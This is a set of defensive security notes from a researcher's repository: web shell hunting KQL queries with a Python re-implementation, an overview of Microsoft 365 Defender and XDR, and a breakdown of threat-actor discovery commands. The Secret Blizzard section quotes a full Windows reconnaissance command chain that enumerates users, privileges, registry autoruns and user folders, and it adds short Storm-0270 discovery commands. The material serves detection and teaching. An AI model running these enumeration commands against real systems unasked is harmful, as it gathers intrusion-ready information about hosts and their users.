56 | 57 | As the initial access method, Cadet Blizzard employed the web shell technique by exploiting vulnerabilities in Confluence servers([CVE-2021-26084](https://nvd.nist.gov/vuln/detail/CVE-2021-26084)), Exchange servers (including [CVE-2022-41040](https://nvd.nist.gov/vuln/detail/CVE-2022-41040) and ProxyShell), and likely commodity vulnerabilities in various open-source platforms like content management systems. 58 | 59 | 60 | 61 | 62 | > June 14, 2023, [Cadet Blizzard emerges as a novel and distinct Russian threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) 63 | 64 | ### Ghost in the shell 65 | 66 | As web shell attacks continue to increase, exploiting misconfigurations and vulnerabilities, Microsoft security team is actively investigating the matter and offering in-depth insights in their blog. Microsoft stated that the attack kill chain is ***"one of increasingly more common incidents of web shell attacks affecting multiple organizations in various sectors"***. 67 | 68 | These nation-state cyberattacks have utilized web shells as the initial access point in their campaigns. 
69 | 70 | | Threat Actor | Comment | 71 | |:-------------|:--------| 72 | | [Diamond Sleet (ZINC)](https://www.microsoft.com/en-us/security/blog/2021/01/28/zinc-attacks-against-security-researchers/) | North Korea-based activity group | 73 | | [Secret Blizzard (KRYPTON)](https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims)| Russia-based activity group | 74 | | [Granite Typhoon (GALLIUM)](https://www.microsoft.com/en-us/security/blog/2019/12/12/gallium-targeting-global-telecom/) | China-based activity group | 75 | 76 | 77 | 78 | > February 4, 2020, [Ghost in the shell: Investigating web shell attacks](https://www.microsoft.com/en-us/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/) 79 | 80 | ## KQL : Threat Hunting 81 | Regarding KQL threat hunting, I came across some amazing blogs that focus on web shell hunting. Let me introduce them here. 82 | 83 | 84 | #### Web Shell Attack on Sharepoint Server Exploiting CVE-2019-0604 85 | This query is designed to track web shell installation activities on a Sharepoint Server by combining the W3CIISLog table and the SecurityAlert table, which originates from Microsoft Defender for Endpoint alerts. 
86 | ```kql 87 | let alertTimeWindow = 1h; 88 | let logTimeWindow = 7d; 89 | // Define script extensions that suit your web application environment - a sample are provided below 90 | let scriptExtensions = dynamic([".php", ".jsp", ".js", ".aspx", ".asmx", ".asax", ".cfm", ".shtml"]); 91 | let alertData = SecurityAlert 92 | | where TimeGenerated > ago(alertTimeWindow) 93 | | where ProviderName == "MDATP" 94 | // Parse and expand the alert JSON 95 | | extend alertData = parse_json(Entities) 96 | | mvexpand alertData; 97 | let fileData = alertData 98 | // Extract web script files from MDATP alerts - our malicious web scripts - candidate web shells 99 | | where alertData.Type =~ "file" 100 | | where alertData.Name has_any(scriptExtensions) 101 | | extend FileName = tostring(alertData.Name), Directory = tostring(alertData.Directory); 102 | let hostData = alertData 103 | // Extract server details from alerts and map to alert id 104 | | where alertData.Type =~ "host" 105 | | project HostName = tostring(alertData.HostName), DnsDomain = tostring(alertData.DnsDomain), SystemAlertId 106 | | distinct HostName, DnsDomain, SystemAlertId; 107 | // Join the files on their impacted servers 108 | let webshellData = fileData 109 | | join kind=inner (hostData) on SystemAlertId 110 | | project TimeGenerated, FileName, Directory, HostName, DnsDomain; 111 | webshellData 112 | | join ( 113 | // Find requests that were made to this file on the impacted server in the W3CIISLog table 114 | W3CIISLog 115 | | where TimeGenerated > ago(logTimeWindow) 116 | // Restrict to accesses to script extensions 117 | | where csUriStem has_any(scriptExtensions) 118 | | extend splitUriStem = split(csUriStem, "/") 119 | | extend FileName = splitUriStem[-1], HostName = sComputerName 120 | // Summarize potential attacker activity 121 | | summarize count(), StartTime=min(TimeGenerated), EndTime=max(TimeGenerated), RequestUserAgents=make_set(csUserAgent), ReqestMethods=make_set(csMethod), 
RequestStatusCodes=make_set(scStatus), RequestCookies=make_set(csCookie), RequestReferers=make_set(csReferer), RequestQueryStrings=make_set(csUriQuery) by AttackerIP=cIP, SiteName=sSiteName, ShellLocation=csUriStem, tostring(FileName), HostName 122 | ) on FileName, HostName 123 | | project StartTime, EndTime, AttackerIP, RequestUserAgents, SiteName, ShellLocation, ReqestMethods, RequestStatusCodes, RequestCookies, RequestReferers, RequestQueryStrings, RequestCount = count_ 124 | // Expose the attacker ip address as a custom entity 125 | | extend timestamp=StartTime, IPCustomEntity = AttackerIP 126 | ``` 127 | > Jun 09 2020, [Web shell threat hunting with Azure Sentinel and Microsoft Threat Protection](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel-and-microsoft/ba-p/1448065) 128 | 129 | 130 | #### Web Shell Attack on Exchange servers exploiting vulnerabilities - [Silk Typhoon (HAFNIUM)](https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/) 131 | This query is designed to track web shell installation activities on an Exchange Server by combining the W3CIISLog table and the SecurityAlert table, which originates from Microsoft Defender for Endpoint alerts. 
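The SharePoint query above does two joins: alert file entities to alert host entities (by alert id), then that pair to IIS requests (by file name and host). As an added example (my code, not the query authors' or Microsoft's), the same logic is worked in Python over constructed data so each step can be inspected offline before the Exchange-specific KQL variant that follows. The alert ids, host names, paths, IP addresses and log lines are constructed placeholders; `endswith` stands in for KQL's `has_any` term match, and the 7-day window is anchored to the newest log line because there is no live clock to compare against.

```python
"""Join MDE-style alert file entities to IIS request logs, as the KQL query does (added example)."""
import json
from datetime import datetime, timedelta

# Script extensions treated as candidate web shells; assumption mirroring the query's list.
SCRIPT_EXTENSIONS = (".php", ".jsp", ".js", ".aspx", ".asmx", ".asax", ".cfm", ".shtml")

# Constructed sample alerts shaped like SecurityAlert rows with an Entities JSON column.
# Alert ids, host names and paths are placeholders, not values from any real incident.
SAMPLE_ALERTS = [
    {"SystemAlertId": "alert-0001", "ProviderName": "MDATP", "TimeGenerated": "2021-03-03T10:05:00",
     "Entities": json.dumps([
         {"Type": "file", "Name": "web.aspx", "Directory": "C:\\inetpub\\wwwroot\\aspnet_client"},
         {"Type": "host", "HostName": "EXCH01", "DnsDomain": "corp.example"}])},
    {"SystemAlertId": "alert-0002", "ProviderName": "MDATP", "TimeGenerated": "2021-03-03T11:00:00",
     "Entities": json.dumps([
         {"Type": "file", "Name": "payload.exe", "Directory": "C:\\Users\\Public"},  # not a script
         {"Type": "host", "HostName": "WS07", "DnsDomain": "corp.example"}])},
]

# Constructed W3C extended-format IIS log (IIS writes '+' for spaces inside the user agent).
SAMPLE_IIS_LOG = """\
#Fields: date time s-sitename s-computername cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2021-03-03 10:06:12 W3SVC1 EXCH01 POST /aspnet_client/web.aspx - 198.51.100.23 python-requests/2.25 200
2021-03-03 10:06:15 W3SVC1 EXCH01 POST /aspnet_client/web.aspx cmd=whoami 198.51.100.23 python-requests/2.25 200
2021-03-03 10:07:01 W3SVC1 EXCH01 GET /owa/auth/logon.aspx - 203.0.113.9 Mozilla/5.0+(Windows) 200
2021-03-03 10:09:40 W3SVC1 EXCH01 GET /aspnet_client/web.aspx - 198.51.100.23 curl/7.68.0 404
2021-03-03 10:10:00 W3SVC1 WEB02 POST /aspnet_client/web.aspx - 198.51.100.23 curl/7.68.0 200
"""


def candidate_webshells(alerts):
    """Pair each script-file entity with the host entities of the same alert (the fileData/hostData join)."""
    pairs = []
    for alert in alerts:
        if alert.get("ProviderName") != "MDATP":
            continue
        entities = json.loads(alert["Entities"])  # mvexpand equivalent
        files = [e for e in entities if e.get("Type", "").lower() == "file"
                 and e.get("Name", "").lower().endswith(SCRIPT_EXTENSIONS)]
        hosts = {(e["HostName"], e.get("DnsDomain", "")) for e in entities if e.get("Type", "").lower() == "host"}
        for f in files:
            for host, domain in hosts:
                pairs.append({"FileName": f["Name"], "Directory": f.get("Directory", ""),
                              "HostName": host, "DnsDomain": domain, "SystemAlertId": alert["SystemAlertId"]})
    return pairs


def parse_iis_log(text):
    """Parse W3C extended-format lines into dicts keyed by the names in the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):  # skip malformed lines rather than misalign columns
                rows.append(dict(zip(fields, values)))
    return rows


def _stamp(row):
    return datetime.fromisoformat(f"{row['date']}T{row['time']}")


def hunt_webshell_requests(alerts, log_text, log_window=timedelta(days=7), now=None):
    """Join alert-derived shells to IIS requests on (FileName, HostName); summarise per client IP."""
    shells = {(p["FileName"].lower(), p["HostName"].lower()) for p in candidate_webshells(alerts)}
    rows = parse_iis_log(log_text)
    if now is None and rows:  # offline sample: anchor the window to the newest log line
        now = max(_stamp(r) for r in rows)
    summary = {}
    for r in rows:
        stem = r["cs-uri-stem"]
        file_name = stem.rsplit("/", 1)[-1]
        if not file_name.lower().endswith(SCRIPT_EXTENSIONS):
            continue
        if (file_name.lower(), r["s-computername"].lower()) not in shells:
            continue
        ts = _stamp(r)
        if ts < now - log_window:
            continue
        key = (r["c-ip"], r["s-sitename"], stem, r["s-computername"])
        e = summary.setdefault(key, {"RequestCount": 0, "StartTime": ts, "EndTime": ts,
                                     "RequestMethods": set(), "RequestStatusCodes": set(),
                                     "RequestUserAgents": set(), "RequestQueryStrings": set()})
        e["RequestCount"] += 1
        e["StartTime"], e["EndTime"] = min(e["StartTime"], ts), max(e["EndTime"], ts)
        e["RequestMethods"].add(r["cs-method"])
        e["RequestStatusCodes"].add(r["sc-status"])
        e["RequestUserAgents"].add(r["cs(User-Agent)"].replace("+", " "))
        if r["cs-uri-query"] != "-":
            e["RequestQueryStrings"].add(r["cs-uri-query"])
    return summary


if __name__ == "__main__":
    for (ip, site, location, host), s in hunt_webshell_requests(SAMPLE_ALERTS, SAMPLE_IIS_LOG).items():
        print(f"{ip} -> {host}:{location} ({site}) {s['RequestCount']} requests, "
              f"{s['StartTime']:%H:%M:%S}-{s['EndTime']:%H:%M:%S}, methods={sorted(s['RequestMethods'])}")
```

On the sample data only the alerted host EXCH01 and the alerted file `web.aspx` survive both joins: the request to `WEB02` for the same file name is dropped because no alert named that host, and `logon.aspx` is dropped because no alert named that file. That is the point of joining on both keys rather than file name alone.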
```kql
let timeWindow = 3d;
// Script file extensions to match on, can be expanded for your environment
let scriptExtensions = dynamic([".asp", ".aspx", ".asmx", ".asax"]);
SecurityAlert
| where TimeGenerated > ago(timeWindow)
| where ProviderName == "MDATP"
// Parse and expand the alert JSON
| extend alertData = parse_json(Entities)
| mvexpand alertData
| where alertData.Type == "file"
// This can be expanded to include more file types
| where alertData.Name has_any(scriptExtensions)
| extend FileName = tostring(alertData.Name), Directory = tostring(alertData.Directory)
| project TimeGenerated, FileName, Directory
| join (
    W3CIISLog
    | where TimeGenerated > ago(timeWindow)
    | where csUriStem has_any(scriptExtensions)
    | extend splitUriStem = split(csUriStem, "/")
    | extend FileName = splitUriStem[-1]
    | summarize StartTime=min(TimeGenerated), EndTime=max(TimeGenerated) by AttackerIP=cIP, AttackerUserAgent=csUserAgent, SiteName=sSiteName, ShellLocation=csUriStem, tostring(FileName)
) on FileName
| project StartTime, EndTime, AttackerIP, AttackerUserAgent, SiteName, ShellLocation
```
> Mar 25 2021, [Web Shell Threat Hunting with Azure Sentinel](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968)

## Reference
- September 23, 2020, [Web shell attack deep dive | Microsoft Security](https://www.youtube.com/watch?v=jvGUahJGJnY)
- February 11, 2021, [Web shell attacks continue to rise | Microsoft Security blog](https://www.microsoft.com/en-us/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/)

## Video
- [Unveiling Webshells: The Stealthy Webserver Malware | Cybersecurity Deep Dive](https://www.youtube.com/watch?v=gJJ-A3YUXG0) by Michael Melone

#### Disclaimer
The views and opinions
expressed herein are those of the author and do not necessarily reflect the views of the company.

--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day09-XDR-Insights-part1.md:
--------------------------------------------------------------------------------
# Day 9 - XDR Incident Response insights
When organizations purchase E5 security, their first challenge is often product deployment. However, ***the next significant challenge arises in "security operations"***, particularly dealing with daily incident response. While Microsoft provides detailed insights and various features, SOC teams might feel overwhelmed when alerts and incidents are generated in their environment.

When alerts/incidents are generated in your tenant, some people may have the following concerns and challenges.

1. ***No idea where to start the investigation...***
2. ***Where exactly do I have to look ?***
3. ***What kind of options do I have ?***
4. ***What capabilities can I leverage in XDR ?***

In light of this, I aim to expand their understanding of ***XDR*** and ***Microsoft 365 Defender*** to help them overcome these challenges.
Therefore, in this blog, I am going to explore the power of XDR and Microsoft 365 Defender; let's start with Part 1.

| # | Title | About |
|:-----|:----- |:------|
| 1 | XDR overview | This blog is for people who are not aware of XDR. It aims to start the journey of exploring XDR, specifically Microsoft 365 Defender. |
| 2 | [XDR Incident Investigation](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day10-XDR-Insights-part2.md) | This blog focuses on Incident Response in the Microsoft 365 Defender portal. Part 1 covers the fundamentals, while ***Part 2 delves into core incident investigation.*** |

## What is XDR ?
Extended detection and response describes ***a unified security incident detection and response platform*** that automatically collects and ***correlates data from multiple proprietary security components***.
> Gartner® Innovation Insight for Extended Detection and Response

## Gartner® Magic Quadrant™
Before we dive into the power of XDR and Microsoft 365 Defender in this blog, let's take a look at the market research results for Endpoint Protection/XDR over the past two years.
As shown in the results over the past two years, Microsoft has consistently maintained its position as ***a Leader***.
> [!Important]
> According to [the Gartner report](https://www.gartner.com/doc/reprints?id=1-2AJ91JO6&ct=220707&st=sb) in 2022, Microsoft's highest scores are for its market understanding and overall viability. This reflects the strong performance of its security business and an early move to define and ***evolve the emerging XDR category***. Microsoft achieved this through ***deep integration and automation between Microsoft Defender for Endpoint and other Microsoft products***, particularly Azure Active Directory, enabling an emerging identity threat detection and response (ITDR) capability.
![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b4039697-5aec-4d5d-a710-a7fa5310ada6)

- [Microsoft is named a Leader in the 2022 Gartner® Magic Quadrant™ for Endpoint Protection Platforms](https://www.microsoft.com/en-us/security/blog/2023/03/02/microsoft-is-named-a-leader-in-the-2022-gartner-magic-quadrant-for-endpoint-protection-platforms/)
- [Gartner names Microsoft a Leader in the 2021 Endpoint Protection Platforms Magic Quadrant](https://www.microsoft.com/en-us/security/blog/2021/05/11/gartner-names-microsoft-a-leader-in-the-2021-endpoint-protection-platforms-magic-quadrant/)

## XDR, Microsoft 365 Defender
In Microsoft Security, we have an XDR solution called [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-365-defender?view=o365-worldwide), which provides a wide range of protection, including the following Defender suite:

| Product | Protection |
|:--------|:--------|
| Microsoft Defender for Office 365 (MDO) | Email security |
| Microsoft Defender for Cloud Apps (MDA) | App & Data security |
| Microsoft Defender for Endpoint (MDE) | Endpoint security |
| Microsoft Defender for Identity (MDI) | On-premises identity security |
| Microsoft Entra ID Protection | Cloud-based identity security |

### XDR advantages in Microsoft 365 Defender
Firstly, there are a number of great features in Microsoft 365 Defender, and I would like to spotlight four pivotal attributes that have the potential to optimize your security operations, as outlined below:
1. Combined incidents queue
2. Automatic attack disruption
3. Automated investigation and response
4. Threat Hunting, KQL

## Combined incidents queue, XDR
Thanks to the power of XDR, a Microsoft 365 Defender incident correlates multiple Defender alerts and all affected entities into a cohesive view - ***a single unified incident***.

The [Peach Sandstorm](https://www.microsoft.com/en-us/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/) (previously HOLMIUM) attack is a great example of how Microsoft 365 Defender efficiently detects individual alerts and seamlessly correlates them into a single incident, showcasing the power of XDR.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/23388f31-bcd3-443a-a6f0-290d89248bc3)
> Peach Sandstorm attack techniques with Microsoft 365 Defender

As evidenced by the incident below, Microsoft 365 Defender successfully captured HOLMIUM activities and consolidated 10 alerts into a single incident. This streamlined approach empowers the SOC team to readily comprehend affected assets and promptly implement containment measures. Additionally, the Incident view presents the 10 alerts chronologically, enabling the SOC team to discern the attack's progression and origin.

![3m0twjyu](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/c4525b0a-1d6b-49e7-90de-08cb07d9f009)
> Peach Sandstorm detection & incident page in Microsoft 365 Defender

## Automatic attack disruption
Automatic attack disruption in Microsoft 365 Defender uses XDR signals from different sources (endpoints, email, identity, data) to ***automatically contain compromised assets and stop ongoing cyber attacks, minimizing their impact on organizations***.

> [!Note]
> What is the objective of attack disruption?
> The main objective of this feature is to achieve ***containment*** during the incident response phase. In terms of automatic disruption, there are two actions that can be taken: ***"device contain"*** by Microsoft Defender for Endpoint and ***"disable user"*** by Microsoft Defender for Identity.

Microsoft 365 Defender XDR provides coverage for the following three advanced attacks to disrupt further progression.

| Advanced attack | Microsoft Security blog |
|:----------------|:------------------------|
| Adversary-in-the-middle attacks (AiTM) | [Automatically disrupt adversary-in-the-middle (AiTM) attacks with XDR](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatically-disrupt-adversary-in-the-middle-aitm-attacks-with/ba-p/3821751) |
| Business email compromise (BEC) | [XDR attack disruption in action – Defending against a recent BEC attack](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/xdr-attack-disruption-in-action-defending-against-a-recent-bec/ba-p/3749822) |
| Human-operated ransomware attacks | [Automatic disruption of Ransomware and BEC attacks with Microsoft 365 Defender](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) |

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8097addd-e570-4bf9-a8f1-be3fa6f456ff)
> Incident view showing the yellow bar where [automatic attack disruption](https://learn.microsoft.com/en-us/microsoft-365/security/defender/automatic-attack-disruption?view=o365-worldwide) took action

## Automated investigation and response

[Automated investigation and response](https://learn.microsoft.com/en-us/microsoft-365/security/defender/m365d-autoir?view=o365-worldwide) (AIR) in Microsoft 365 Defender significantly enhances security team efficiency by automatically investigating generated incidents and responding to malicious entities. This automated process resolves numerous incidents without any interaction from the security team.

Once alerts are generated in Microsoft 365 Defender, AIR triggers a playbook, initiates the investigation process, and takes remediation actions for both devices and emails.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/536b3cef-c0c7-4d57-b7a3-2df762b14596)
> Automated Investigation and Response page in Microsoft 365 Defender portal

## Threat Hunting with KQL
[Advanced Hunting](https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-overview?view=o365-worldwide) is an incredible XDR feature within Microsoft 365 Defender. This capability enables us to analyze vast amounts of security-related data across an organization's endpoints, identities, applications, emails, and more by leveraging ***Kusto Query Language*** (KQL).

> [!Warning]
> The data from all tables remains available for up to **30 days** in Advanced Hunting, Microsoft 365 Defender. If you wish to retain raw data (logs) for more than 30 days, I recommend utilizing [Microsoft Sentinel](https://learn.microsoft.com/en-us/azure/sentinel/overview), which allows you to keep the data for up to **2 years**.

![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e890a657-829d-444d-a369-cceb8b37862f)
> Advanced Hunting page in Microsoft 365 Defender portal

By combining two tables from different products, you can gain additional insights.
For instance, when you merge email and identity tables, you can obtain not only information about email cases classified as malware/phishing but also relevant user account details, including city, country, job title, and more.
![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/541ad329-b435-45f8-a874-24b37c4ac874)

For those interested in learning KQL, I recommend the following webinars.

- #### Microsoft 365 Defender / KQL Webcast
This webinar series is an excellent resource for those who are new to KQL in Microsoft 365 Defender. Each webinar in the series covers the fundamentals of KQL and demonstrates great use cases. As my work mainly focuses on XDR in Microsoft 365 Defender, I found these webinars particularly helpful and informative.

1. [M365 Defender (MTP) webinar: Tracking the Adversary E1: KQL Fundamentals](https://www.youtube.com/watch?v=0D9TkGjeJwM)
2. [M365 Defender (MTP) webinar: Tracking the Adversary E2: Joins](https://www.youtube.com/watch?v=LMrO6K5TWOU)
3. [M365 Defender (MTP) webinar: Tracking the Adversary E3: Summarizing, Pivoting, and Visualizing Data](https://www.youtube.com/watch?v=UKnk9U1NH6Y)
4. [M365 Defender (MTP) webinar: Tracking the Adversary E4 Let’s hunt! Applying KQL to incident tracking](https://www.youtube.com/watch?v=2EUxOc_LNd8&list=RDCMUCGTUbqE3SJiLgtvWjIkSQuQ&index=3)

- #### Microsoft Sentinel webinar / KQL part 1-3
After attending the Microsoft 365 Defender Webcast, I continued to explore KQL in greater depth. For those using Microsoft Sentinel and Azure Data Explorer, these webinars can provide an excellent starting point for learning KQL.

1. [Azure Sentinel webinar: KQL part 1 of 3 - Learn the KQL you need for Azure Sentinel!](https://www.youtube.com/watch?v=EDCBLULjtCM)
2. [Azure Sentinel webinar: KQL part 2 of 3 - KQL hands-on lab exercises!](https://www.youtube.com/watch?v=YKD_OFLMpf8)
3. [Azure Sentinel webinar: KQL part 3 of 3 - Optimizing Azure Sentinel KQL queries performance!](https://www.youtube.com/watch?v=jN1Cz0JcLYU)

#### Disclaimer
The views and opinions expressed herein are those of the author and do not necessarily reflect the views of the company.

--------------------------------------------------------------------------------
/SecurityResearcher-Note-Folder/Day19-ThreatActor-Discovery.md:
--------------------------------------------------------------------------------
# Day 19 - Threat actor, discovery techniques

Hello, all defenders,

During the holidays, I had a chance to read Microsoft Security blogs about Secret Blizzard, a Russia-based nation-state threat actor.
In Part 2 of the blog, I noticed they used a batch file to collect device information, and the commands were excessively long.
This time, I would like to break down each command. Additionally, I'd like to explore how other threat actors have used discovery techniques.

## Secret Blizzard
Microsoft's Security blog provides insights into attacks linked to the Russian nation-state actor that Microsoft tracks as **Secret Blizzard** and that other security vendors call Turla, Waterbug, Venomous Bear, Snake, Turla Team, or Turla APT Group.
According to the blog, Secret Blizzard is recognized for targeting diverse industries, with a particular focus on ministries of foreign affairs, embassies, government agencies, defense organizations, and defense-related enterprises globally.
Secret Blizzard aims to maintain long-term access to systems for intelligence gathering. They use multiple backdoors, including peer-to-peer and C2 communication tools. During attacks, they steal documents, PDFs, and email content.

- December 4, 2024, [Frequent freeloader part I: Secret Blizzard compromising Storm-0156 infrastructure for espionage](https://www.microsoft.com/en-us/security/blog/2024/12/04/frequent-freeloader-part-i-secret-blizzard-compromising-storm-0156-infrastructure-for-espionage/)
- December 11, 2024, [Frequent freeloader part II: Russian actor Secret Blizzard using tools of other groups to attack Ukraine](https://www.microsoft.com/en-us/security/blog/2024/12/11/frequent-freeloader-part-ii-russian-actor-secret-blizzard-using-tools-of-other-groups-to-attack-ukraine/)

***Blog Part II*** mentions that the attacker used a reconnaissance tool, a batch file, to collect device information. However, the command used is incredibly long, so I will dive into each command.

### Command :

![image](https://github.com/user-attachments/assets/9436fe51-0d45-4a76-b528-dd26a7906f02)

```cmd
ver & systeminfo & ipconfig -all & ipconfig /displaydns & route print & arp -a & netstat -a -n & net share & net use & net user & whoami /all & wmic useraccount get name,sid & net localgroup & net accounts & net config & net time \\127.0.0.1 & set & netsh firewall show portopening & netsh firewall show allowedprogram & netsh firewall show config & tasklist /v & tasklist /svc & echo . | powershell get-hotfix & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /s & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA & dir /x c:\ & dir /x c:\users\ & dir %tmp% & dir "c:\program files (x86)" /x & dir "c:\program files" /x & tree "%UserProfile%\Desktop" /A & tree "%UserProfile%\Documents" /A & tree "%UserProfile%\Downloads" /A & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run & reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce & dir /x "c:\windows\microsoft.net\framework"
```

### Techniques table
| Command | Description | Attacker's Purpose |
|:----------------------|:-------------------------------------|:-------------------------------------|
| ver | Displays the Windows version. | Identifies the OS version to tailor attacks (e.g., compatible exploits). |
| systeminfo | Lists detailed system information, including OS build, hardware, and hotfixes. | Gathers information on installed patches, hardware, and OS for vulnerability identification. |
| ipconfig | Shows network configuration details like IP address, DNS, and gateway. | Collects network information to locate targets or misconfigured systems. |
| route | Displays the routing table for network traffic. | Identifies network routes to understand potential pathways for lateral movement. |
| arp | Displays the ARP table (MAC-to-IP mappings). | Maps connected devices in the network to identify targets. |
| netstat | Shows active network connections, listening ports, and their states. | Discovers open ports and active connections for reconnaissance or pivoting. |
| net | A suite of subcommands for managing network resources and users. | Gathers user, group, and shared resource details to find misconfigurations or potential entry points. |
| whoami | Displays the current user and security group memberships. | Confirms privileges and checks group memberships for possible privilege escalation. |
| wmic | Queries system management information (e.g., user accounts, processes). | Enumerates users, processes, and services to identify vulnerabilities or attack opportunities. |
| set | Displays environment variables. | Finds useful environment variables for potential exploitation (e.g., paths, credentials, or temporary files). |
| netsh | Manages network and firewall settings. | Checks firewall rules to identify allowed programs or open ports for bypassing security. |
| tasklist | Displays running processes and associated services. | Identifies active processes for privilege escalation or for identifying security software. |
| powershell get-hotfix | Lists installed updates on the system. | Identifies missing updates for known vulnerabilities to exploit. |
| reg query | Queries registry keys and values. | Inspects critical registry entries for persistence mechanisms, security settings, or misconfigurations. |
| dir | Lists the contents of directories, including file names and attributes. | Finds sensitive files, such as configurations or credentials. |
| tree | Displays the directory structure in a tree format. | Quickly maps the folder hierarchy to locate valuable files or paths. |

### Breakdown by discovery sub-category :

**1) System Information Gathering**

```cmd
ver
systeminfo
set
```

**2) Network Configuration and Connectivity**

```cmd
ipconfig -all
ipconfig /displaydns
route print
arp -a
netstat -a -n
```

**3) User Enumeration**

Here are the details of each command from the top.
- List current user and associated privileges
- Retrieve all local user accounts and their SIDs
- Retrieve local user account details
- List local groups and group memberships

```cmd
whoami /all
wmic useraccount get name,sid
net user
net localgroup
```

**4) Shared Resources and Connections**

Here are the details of each command from the top.
- Enumerate shared resources
- List mapped network drives and active SMB connections

```cmd
net share
net use
```

**5) System Configuration**

Here are the details of each command from the top.
- Retrieve account policies such as password policies
- List workstation or server configurations
- Query the system time of the local machine

```cmd
net accounts
net config
net time \\127.0.0.1
```

**6) Firewall and Security Policies**

```cmd
netsh firewall show portopening
netsh firewall show allowedprogram
netsh firewall show config
```

**7) Process and Service Enumeration**

```cmd
tasklist /v
tasklist /svc
```

**8) Patch and Hotfix Information**

```cmd
echo . | powershell get-hotfix
```

**9) Registry Enumeration**

Here are the details of each command from the top.
- List all registry values in the System policies section
- Check the status of User Account Control (UAC)
- List startup programs for the current user
- List startup programs for all users
- List one-time startup programs
- List 32-bit startup programs for all users
- List one-time 32-bit startup programs

```cmd
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /s
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce
```

**10) File and Directory Enumeration**

Here are the details of each command from the top.
- List files and directories on the root of the C drive (with short names)
- List files and directories in the Users folder
- List files and directories in the temporary folder
- List files in the Program Files (x86) folder
- List files in the Program Files folder
- Display a tree structure of the user's desktop folder
- Display a tree structure of the user's documents folder
- Display a tree structure of the user's downloads folder
- List files in the .NET Framework directory

```cmd
dir /x c:\
dir /x c:\users\
dir %tmp%
dir "c:\program files (x86)" /x
dir "c:\program files" /x
tree "%UserProfile%\Desktop" /A
tree "%UserProfile%\Documents" /A
tree "%UserProfile%\Downloads" /A
dir /x "c:\windows\microsoft.net\framework"
```

## Storm-0270
Microsoft's threat intelligence teams have linked several ransomware campaigns to DEV-0270, also known as Nemesis Kitten, a subgroup of the Iranian actor PHOSPHORUS.
In the DEV-0270 campaigns, some of the observed discovery techniques use WMI and PowerShell to discover domain, email, and network information.

- September 7, 2022, [Profiling DEV-0270: PHOSPHORUS’ ransomware operations](https://www.microsoft.com/en-us/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/)

![image](https://github.com/user-attachments/assets/98dc7d8e-10c7-4d76-a054-a83e88010b35)
> Figure 1. Typical DEV-0270 attack chain

> [!Note]
> - PHOSPHORUS is now tracked as Mint Sandstorm
> - DEV-0270 is now tracked as Storm-0270

### Command :
```cmd
wmic computersystem get domain
whoami
net user
```

```powershell
# Retrieves the primary SMTP email address (SmtpAddress) of the first recipient in the list and displays it in a table without headers.
Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders
```

```powershell
# Finds domain controller information in the network using PowerShell.
powershell.exe /c Get-WMIObject Win32_NTDomain | findstr DomainController
```
```cmd
rem Searches for "DomainController" in a file or command output.
findstr.exe DomainController
```

## Mango Sandstorm
Mango Sandstorm, an Iran-based threat actor, exploited remote code execution vulnerabilities in Apache Log4j 2 (known as 'Log4Shell') on vulnerable SysAid Server instances used by their targets.
